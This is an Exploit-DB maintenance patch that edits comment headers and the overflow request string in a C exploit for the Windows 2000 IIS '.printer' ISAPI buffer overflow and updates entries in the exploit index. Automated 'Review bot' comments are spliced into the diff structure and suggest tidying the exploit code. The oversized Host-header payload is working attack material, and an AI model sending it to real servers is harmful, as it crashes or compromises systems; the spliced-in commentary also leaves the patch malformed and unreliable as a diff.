From 9bd9fb0da3e7ea40cb9a948aa8c9a45d2aa750ff Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 11 Dec 2018 05:01:44 +0000
Subject: [PATCH] DB: 2018-12-11
2 changes to exploits/shellcodes
Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting
DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting
Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting
DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting
---
 exploits/windows/remote/20816.c | 1 +
 exploits/windows/remote/20817.c | 6 +++---
 files_exploits.csv | 4 ++--
 3 files changed, 6 insertions(+), 5 deletions(-)
diff --git a/exploits/windows/remote/20816.c b/exploits/windows/remote/20816.c
index 5a6d162fd..05241332a 100644
--- a/exploits/windows/remote/20816.c
+++ b/exploits/windows/remote/20816.c
@@ -1,3 +1,4 @@
+/*
 source: http://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
diff --git a/exploits/windows/remote/20817.c b/exploits/windows/remote/20817.c
index 9d76851d4..f555645dd 100644
--- a/exploits/windows/remote/20817.c
+++ b/exploits/windows/remote/20817.c
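Review bot: The added `/*` on the first line of 20816.c has no matching `*/` anywhere in this hunk, and the diffstat records only one insertion for that file, so the comment must be closed by a delimiter that already exists further down — worth confirming, because an unclosed block comment would swallow every line after the header up to the next `*/` in the file. The sibling hunk in 20817.c adds both `/*` and `*/`, which is the self-contained form; if 20816.c's closer is not already present, the same `+*/` line is needed after the description text.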
@@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/2674/info Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack. * If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings.
+*/
 /* Author: styx^
@@ -268,9 +270,7 @@ void scan(char *ip) { int result(int sock) {
- char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n";
+ char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n";
 char buf[1024];
 int i = 0;
diff --git a/files_exploits.csv b/files_exploits.csv
index 163a32885..ecfd4868c 100644
--- a/files_exploits.csv
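Review bot: The rewritten declaration in `result()` keeps `expl` as a plain `char *` while initialising it from a string literal; nothing here should ever write through that pointer, so `const char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAA…\n\n";` (or `static const char expl[] = …;`) states that contract and makes the compiler reject a write, which would otherwise be undefined behaviour on a literal. Collapsing the three physical lines into one literal is the right fix: the removed form is an unterminated string constant and could not have compiled. The body of `result()` continues outside the hunk, so if the length handed to the later send call is a hard-coded byte count rather than `strlen(expl)` (or `sizeof expl - 1` with the array form), it should be checked against the joined literal, whose length is now easy to keep in sync.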
+++ b/files_exploits.csv
@@ -40456,5 +40456,5 @@ id,file,description,date,author,type,platform,port
 45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
 45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80
 45957,exploits/php/webapps/45957.py,"i-doit CMDB 1.11.2 - Remote Code Execution",2018-12-09,AkkuS,webapps,php,
-45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,
-45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,
+45958,exploits/php/webapps/45958.txt,"Adiscon LogAnalyzer < 4.1.7 - Cross-Site Scripting",2018-12-09,"Gustavo Sorondo",webapps,php,80
+45959,exploits/php/webapps/45959.txt,"DomainMOD 4.11.01 - 'DisplayName' Cross-Site Scripting",2018-12-09,"Mohammed Abdul Raheem",webapps,php,80